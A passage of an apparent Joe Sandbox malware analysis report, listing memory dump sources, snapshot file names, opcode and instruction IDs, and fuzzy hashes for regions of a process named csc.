                                                                                                                        • Opcode Fuzzy Hash: 92f3fc4c39d6eb07305983607a4be6fcaff8139597cd4b7f014e45f3d1c0f291
                                                                                                                        • Instruction Fuzzy Hash: 37D012F18057915FD7268B2094698507F70BA1730435620EFD941C8556E2799407C717
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                        • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                        • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                        • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789447683.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e3c0a2865ab30154c872750d6ce8b0a265f78853aeeb58d80b939a4adeb7e9e9
                                                                                                                        • Instruction ID: 43193d58c792e5d1b388fdccb85984eee8dcb17f4c9cfed27c489ffc4ac89ec5
                                                                                                                        • Opcode Fuzzy Hash: e3c0a2865ab30154c872750d6ce8b0a265f78853aeeb58d80b939a4adeb7e9e9
                                                                                                                        • Instruction Fuzzy Hash: F8B0923BA0002986CA00D688E4404DCBB31DA98232F408033C200620008621157A8A60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3788415083.0000000009470000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.3787355907.00000000093B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_93b0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 59d5f71440da1c933e85fb09c99b5b4b41fab7c2c44593378ca04de2aaf279f0
                                                                                                                        • Instruction ID: a2d93584e5af47c26e6d0177fd9a9721f15ce6c0aeb80d83729aa3dcae8ebbbb
                                                                                                                        • Opcode Fuzzy Hash: 59d5f71440da1c933e85fb09c99b5b4b41fab7c2c44593378ca04de2aaf279f0
                                                                                                                        • Instruction Fuzzy Hash: 6AA0112008020C8A828033E2380AF8AF38CAA00028B80A022F20C802020E2AA80200BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789447683.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4283962b018fa77ae883a3a5a669f4ed538ecaa6ef1e5691627a5fa8a45fe845
                                                                                                                        • Instruction ID: 57260eacb209d5203fec10797c1badbdb1a0606addc22065145a3f41fbfe9fa8
                                                                                                                        • Opcode Fuzzy Hash: 4283962b018fa77ae883a3a5a669f4ed538ecaa6ef1e5691627a5fa8a45fe845
                                                                                                                        • Instruction Fuzzy Hash: 8590027104460D8B4780379974895957B5D95549267800155F60D415015A556C5155A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789447683.00000000094C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_94c0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ce24580eb909c1998eb56f971c239d449f9d1521a4e12e00aaa25a1f358f80b0
                                                                                                                        • Instruction ID: 3d3c1dee2982f3ade8ed373641ed7553bb52b4cd05e3c03f7ab94a05ccb6cb6f
                                                                                                                        • Opcode Fuzzy Hash: ce24580eb909c1998eb56f971c239d449f9d1521a4e12e00aaa25a1f358f80b0
                                                                                                                        • Instruction Fuzzy Hash: 65A002A5B041118FDB4555555099338155367C8759F050066DB0AE3341D5590D025585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c289d1a75c4e2078ed7eece625d375a455ccfb991979859db5c7165dc2264d23
                                                                                                                        • Instruction ID: c41d4cfaad7cc3356bbc8fe20280a07ce3554629540118ef74708f9e57468789
                                                                                                                        • Opcode Fuzzy Hash: c289d1a75c4e2078ed7eece625d375a455ccfb991979859db5c7165dc2264d23
                                                                                                                        • Instruction Fuzzy Hash: